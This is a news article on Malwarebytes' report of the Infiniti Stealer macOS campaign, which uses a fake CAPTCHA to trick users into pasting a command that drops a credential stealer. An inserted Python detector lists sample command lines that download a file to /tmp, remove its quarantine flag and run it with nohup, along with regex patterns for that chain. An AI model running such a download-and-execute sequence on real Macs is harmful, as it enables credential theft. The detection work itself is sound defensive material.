Researchers warn that macOS users face browser credential-stealing attack

A newly identified macOS malware campaign is showing how techniques that worked on Windows – like ClickFix – are now being adapted to target Mac users.
Malwarebytes researchers first tracked the threat under the temporary name “NukeChain” but later uncovered an exposed operator that revealed its actual name: Infiniti Stealer.
The malware is built to harvest sensitive information from Macs, including browser credentials, Keychain data, cryptocurrency wallet information, developer secrets stored in files like .env, and even screenshots.
The process starts with a fake verification page hosted at update-check[.]com, which is designed to resemble a human-proving Cloudflare CAPTCHA.
Instead of exploiting a software flaw, the campaign uses a ClickFix con, instructing users to open Terminal (a built-in macOS app that lets you control your computer by typing commands) and paste a command manually.
Once the command is run, a small malicious script (a “Bash dropper”) immediately launches the infection process. First, it downloads the actual malware from the internet and saves it onto the Mac in the temporary folder /tmp.
Then it removes Apple’s built-in safety warning (the quarantine flag), so the system does not treat the file as suspicious.
Next, it runs the malware in the background using a command called nohup, which lets it keep running even if the Terminal window is closed.
It also covertly passes instructions to the malware, such as where to send stolen data, using hidden settings (“Environment variables”).
Finally, it covers its tracks by deleting the script that started everything and automatically closing the Terminal window, so the user doesn’t see what just happened.
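One way to detect the dropper sequence described above, added here as an example and not code from Malwarebytes or the campaign: it correlates command lines per parent shell and flags a /tmp file that is downloaded, stripped of its quarantine attribute, and then launched under nohup. The event format, the choice of curl/wget and xattr as the commands to match, and every sample value are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: (parent shell PID, command line) records such as an EDR
# process-event export might provide. Hosts and file names are placeholders.
SAMPLE_EVENTS = [
    (411, "curl -fsSL https://example.invalid/pkg -o /tmp/helper_bin"),
    (411, "xattr -d com.apple.quarantine /tmp/helper_bin"),
    (411, "nohup /tmp/helper_bin"),
    (502, "curl -o /tmp/report.csv https://example.invalid/report.csv"),
    (502, "open /tmp/report.csv"),
    (777, "xattr -d com.apple.quarantine /Applications/Tool.app"),
]

# Captures a file path under /tmp (or its real location, /private/tmp).
TMP_PATH = r"((?:/private)?/tmp/[^\s\"';&|]+)"

# Stages in the order the article lists them. Assumption: the download uses
# curl or wget and the quarantine flag is removed with xattr.
STAGES = [
    ("download_to_tmp", re.compile(r"\b(?:curl|wget)\b.*?" + TMP_PATH)),
    ("quarantine_removed",
     re.compile(r"\bxattr\b.*com\.apple\.quarantine.*?" + TMP_PATH)),
    ("nohup_exec", re.compile(r"\bnohup\b.*?" + TMP_PATH)),
]


def find_dropper_chains(events):
    """Return sorted (shell_pid, path) pairs where one /tmp file passed
    through every stage, in order, under the same parent shell."""
    progress = defaultdict(int)  # (pid, path) -> index of next expected stage
    for pid, cmd in events:
        # Checking stages in order also handles one pasted line chained with &&.
        for idx, (_name, rx) in enumerate(STAGES):
            m = rx.search(cmd)
            if not m:
                continue
            key = (pid, m.group(1).removeprefix("/private"))
            if progress[key] == idx:
                progress[key] = idx + 1
    return sorted(k for k, done in progress.items() if done == len(STAGES))


if __name__ == "__main__":
    for pid, path in find_dropper_chains(SAMPLE_EVENTS):
        print(f"ALERT shell pid={pid}: {path} downloaded, de-quarantined, run via nohup")
```

Requiring all three stages on the same path keeps ordinary downloads to /tmp and unrelated quarantine changes from alerting on their own.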
The second stage of the attack uses a tool called Nuitka, which changes how the malware is packaged so that, rather than looking like code, it resembles a normal Mac program.
This makes it much harder for security tools and researchers to detect, because they can’t just open it and read what it does. It also blends in better with legitimate software, making it harder to spot and analyze.
Malwarebytes claims that the campaign is the first macOS campaign of its type that combines “ClickFix delivery with a Nuitka-compiled Python stealer.”
The team reminds users not to paste commands into Terminal from websites, as “no legitimate CAPTCHA requires this.”